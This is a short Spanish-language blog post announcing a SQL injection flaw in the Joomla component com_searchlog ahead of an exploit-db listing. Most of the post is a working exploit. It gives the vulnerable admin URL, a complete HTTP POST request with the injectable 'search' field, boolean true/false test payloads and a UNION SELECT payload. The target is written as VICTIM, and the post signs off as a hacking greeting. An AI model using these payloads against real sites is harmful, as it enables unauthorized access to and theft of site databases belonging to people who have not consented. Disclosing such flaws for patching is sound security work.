Vulnerabilidad en com_searchlog, pronto en exploit-db. Un adelanto del post ;) :
(ACTUALIZADO: post aqui)
http://VICTIM/administrator/index.php?option=com_searchlog&act=log
POST /administrator/index.php?option=com_searchlog&act=log HTTP/1.1
Host: VICTIM
Content-Type: application/x-www-form-urlencoded
Content-Length: xxx
search=[SQLi]
&sort=calls&limit=20&limitstart=0&option=com_searchlog&act=log&task=&callbase=1&boxchecked=1&hidemainmenu=0
Where [SQLi] = someLogExisting') and 1=1# => true
someLogExisting') and 1=2# => false
UNION SQLi = someLogExisting') union select 1,2,3,4,5,6,7,8#
-H4ppyH4ck1n9-
No hay comentarios:
Publicar un comentario